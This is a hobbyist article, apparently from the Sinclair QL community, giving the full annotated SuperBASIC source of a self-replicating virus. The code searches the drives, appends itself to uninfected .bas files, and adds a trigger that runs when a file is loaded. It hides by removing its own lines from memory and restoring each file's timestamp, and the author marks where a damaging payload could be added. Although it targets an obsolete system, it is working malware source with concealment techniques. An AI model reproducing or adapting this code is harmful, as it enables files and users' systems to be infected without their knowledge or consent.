S*BASIC Virus

Not submitted for publication in September 1996 nor in December 1998 nor, as a matter of fact, in June 2oo4

After a long-lasting and generally mis-spent career as a hobby programmer, I thought I might be excused just one little virus. This offering is not much; it doesnt set out to be scary or do any damage, it merely sets out to view the principle. However, it is not difficult to see that if this sort of thing had taken off in our little world, we would have been vulnerable!

This virus requires TK2 to work, but should otherwise run on most platforms. It was written before SMSQ/E came into my life, so this particular method does not work so well for that system.

I have implemented Virus as a procedure for no other reason than packaging. Obviously, for reasons of concealment it is better to avoid any form of labeling!

32710 DEFine PROCedure V_i_r_u_s
32711 LOCal ch%(18)

First seek out a target drive. The program default is perhaps a good starting point. However we don't know which devices the victim will have so try them all until we find a suitable one..

32712 IF LEN(PROGD$) > 3 THEN
32713  dev$ = PROGD$
32714 ELSE : IF NOT FTEST("win1_") THEN
32715  dev$ = 'win1_'
32716 ELSE : IF NOT FTEST("flp1_") THEN
32717  dev$ = 'flp1_'
32718 ELSE : IF NOT FTEST("mdv1_") THEN
32719  dev$ = 'mdv1_': ELSE : RETurn : END IF
32720 END IF : END IF : END IF

Initialise variables. c% and n$ are required for the directory operations.

32721 c% = 0: n$ = '': virx$ = 'v_i_r_u_s'

Start decent of directory tree - not really the object of this particular discussion, so we won't go into the details here.

32722 REPeat dir_loop
32723  er = FOP_DIR(dev$ & n$)
32724  IF er >= 0: ch%(c%) = er: ELSE : EXIT dir_loop
32725  pos = -64
32726  REPeat file_loop
32727   pos = pos + 64
32728   IF pos >= FLEN(#ch%(c%)) THEN
32729    CLOSE#ch%(c%)
32730    c% = c% - 1: IF c% < 0: EXIT dir_loop
32731    pos = FPOS(#ch%(c%))
32732   ELSE
32733    GET#ch%(c%)\ pos + 14; n$

n$ now contains the name of a possible candidate. If its length = 0 then it is the name of a deleted file: Ignore and get next file name.

32734    IF LEN(n$) = 0: NEXT file_loop

Determin the type. If a directory type then traverse this branch..

32735    BGET#ch%(c%)\ pos + 5; t%
32736    IF t% = 255: GET#ch%(c%)\ pos: c% = c% + 1: EXIT file_loop

Types other than zero are unlikely to be S(uper)BASIC files, so ignore.

32737    IF t% <> 0: NEXT file_loop

Look for file names ending on bas.

32738    IF LEN(n$) < 5: NEXT file_loop
32739    IF NOT n$(LEN(n$) - 2 TO LEN(n$)) == 'bas': NEXT file_loop

Got one! Open it and check whether it already contains our virus by looking for our signature (V_i_r_u_s):

32740    er = FOPEN(dev$ & n$)
32741    IF er < 0: NEXT file_loop
32742    tc = er: er = 0
32743    GET#tc\ FLEN(#tc) - 21
32744    FOR i = 1 TO LEN(virx$): IF NOT INKEY$(#tc; -1) == virx$(i): er = 1: EXIT i
32745    IF er THEN

Ok, we have a candidate that has not yet been infected. Make a note of the date so that our update is less likely to be detected.

32746     GET#tc\ FLEN(#tc): dt = FUPDT(#tc)

Replicate!

32747     LIST#tc; 32710 TO

Append the trigger command: This is a bit tricky. We want to ensure that the virus gets activated at some point so it is implemented here as a direct command as opposed to a program line (which may never be reached). However, in SMSQ/E at least, this means that the program can neither be EXECuted nor LRUNed: the virus is activated simply by LOADing an infected program. The victim will probably soon notice that something strange is going on here. Doing a LIST, however, will reveal nothing as it surreptiously removes itself from program memory after execution. Furthermore, in this implementation a switch is required (if rnd(0 to 1)) to prevent the virus from calling itself repeatedly at the slight risk of it not getting executed about half of the time. SMSQ, which initialises variables to nul could have a positive switch, but this virus was designed to work on all systems (running TK2). Whether it actually runs or not, dline 32710 TO will ensure that most traces of the virus will be removed from the loaded program.

32748     PRINT#tc; 'if rnd(0 to 1): V_i_r_u_s'\ 'dline 32710 to'
32749     CLOSE#tc

Obfuscate: Re-adjust the time stamp.

32750     SET_FUPDT\ dev$ & n$, dt
32751     EXIT dir_loop
32752    ELSE
32753     CLOSE#tc
32754    END IF
32755   END IF
32756  END REPeat file_loop
32757 END REPeat dir_loop

There is no real payload with this particular virus. After sex it really wants to carry out its life task. This could go here.

End game: Tidy up any open channels.

32758 REPeat close_loop
32759  IF c% < 0: EXIT close_loop
32760  CLOSE#ch%(c%): c% = c% - 1
32761 END REPeat close_loop
32762 END DEFine V_i_r_u_s
     

That's all there is to it! Mind you, this is not a particulary clever virus; so much could go wrong that this program doesn't cater for. But then that wasn't the point of the "article"!


Generated with sb2htm on 2007 Feb 11
©pjwitte March 2oo1